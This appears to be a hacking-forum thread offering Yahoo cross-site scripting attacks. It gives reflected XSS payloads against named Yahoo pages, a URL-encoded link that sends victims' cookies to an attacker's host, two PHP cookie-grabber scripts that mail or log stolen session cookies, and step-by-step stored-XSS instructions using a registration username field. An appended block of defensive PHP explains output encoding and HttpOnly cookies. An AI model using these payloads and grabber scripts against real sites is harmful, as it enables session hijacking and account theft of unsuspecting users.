Yahoo XSS (with cookie grabber)

Status
Thread closed to further replies.

Il_BeCcHiNo

Silver User
11 June 2007

Code:

http://email.yahoosearchmarketing.com/acq/smx/pages/profile.php?

profile.php?

Code:
s=Y";><ScRipt>alert('testByKhalsa');</script>

Code:
o=INVALID";><ScRipt>alert('testByKhalsa');</script>

Code:
s3=";><ScRipt>alert('testByKhalsa');</script>

Code:
s2=";><ScRipt>alert('testByKhalsa');</script>

----------------------------------------------------------------------------------------------------------- 


cookie stealing link:
Code:
http://tw.bbs.yahoo.com/cgi-bin/LocalSearch.cgi?board=&database=bid&keyword=&type=1&query='%3C%2F%53%43%52%49%50%54%3E%3C%53%43%52%49%50%54%3E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%73%74%2E%63%6F%6D%2F%67%72%61%62%62%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E

php grabber:
Code:
<?php
$cookie = $_GET['cookie'];
$Y = explode('Y=', $cookie);
$Y = $Y[1];
$Y = explode(';', $Y);
$Y = $Y[0];
$T = explode('T=', $cookie);
$T = $T[1];
$T = explode(';', $T);
$T = $T[0];
$msg = "<html>Y=".$Y." <br>
<p>T=".$T."<br></html>";
$header = "Content-Type: text/html; charset=ISO-8859-4";
echo $msg;
mail('[email protected]', 'cookie', $msg, $header);
header('Location: http://www.google.ro');
?>

instructions:
Code:
Unescape the escaped chars in the stealing link, change www.host.com to your host, and then escape them back.

------------------------------------------------------------------------------------- 

it goes like this:
you need to "register" yourself an "account" or something...
stupid thing but it works...
go to:
https://buzz.research.yahoo.com/dm/login/register.html
in "username" insert this code:

'><SCRIPT>location.href="http://www.yourhost.com/c.php?c="+escape(document.cookie)</SCRIPT>

this is the c.php:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("m/d/Y g:i:s a");
$referer = getenv('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>

and make a *.txt file:
log.txt
and now upload it to your server.

CHMOD: 777

now on yahoo, click on "I Agree/Register"
and you will get in the address bar something like this:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322
now this is your cookie stealer, this link:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322 (random number)
example:
https://buzz.research.yahoo.com/dm/l...er.html?eid=21
I'd appreciate good posts from you.
"thanks, good work" etc...
have a nice day. :-)
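Every payload in the post works the same way: a reflected query parameter or username closes a quoted HTML attribute and the injected script reads document.cookie. As a defender-side counterpoint (an added example, not code from the original post or from Yahoo), the PHP below shows context-aware output encoding of the reflected s/o parameters and an HttpOnly session cookie so that the cookie is not readable by script. The form markup and the function names are assumptions.

```php
<?php
// Added defensive example (not from the original post). The post's values
// break out of a double-quoted attribute with  ";>  and out of a single-quoted
// one with  '> . Encoding each reflected value for its HTML context turns the
// quotes and angle brackets into entities, so no new tag or attribute is created.

// Encode a value for use inside a quoted HTML attribute or in element text.
function html_encode(string $value): string {
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE avoids emitting an empty
    // string on invalid UTF-8 (which would silently drop the field).
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the profile form with every reflected parameter encoded.
// $params is the query-string array (normally $_GET); hypothetical markup.
function render_profile_form(array $params): string {
    $s = html_encode($params['s'] ?? '');
    $o = html_encode($params['o'] ?? '');
    return '<form method="get" action="profile.php">' . "\n"
         . '  <input name="s" value="' . $s . '">' . "\n"
         . '  <input name="o" value="' . $o . '">' . "\n"
         . '</form>' . "\n";
}

// Start the session with a cookie that script cannot read. Even if an encoding
// bug slips through, location.href=...+escape(document.cookie) gets nothing.
function start_hardened_session(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // sent only over HTTPS
        'httponly' => true,   // not exposed through document.cookie
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed sample request mirroring the first payload in the post.
$sample = ['s' => 'Y";><ScRipt>alert(\'testByKhalsa\');</script>', 'o' => 'INVALID'];
echo render_profile_form($sample);
```

In the rendered output the injected `"` becomes `&quot;` and `<` becomes `&lt;`, so the browser keeps the whole payload inside the value attribute as inert text.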

Quoted, you're quite right. This time I'd suggest leaving it as is; anyway, if they're lamers they won't even know how to use it ;)
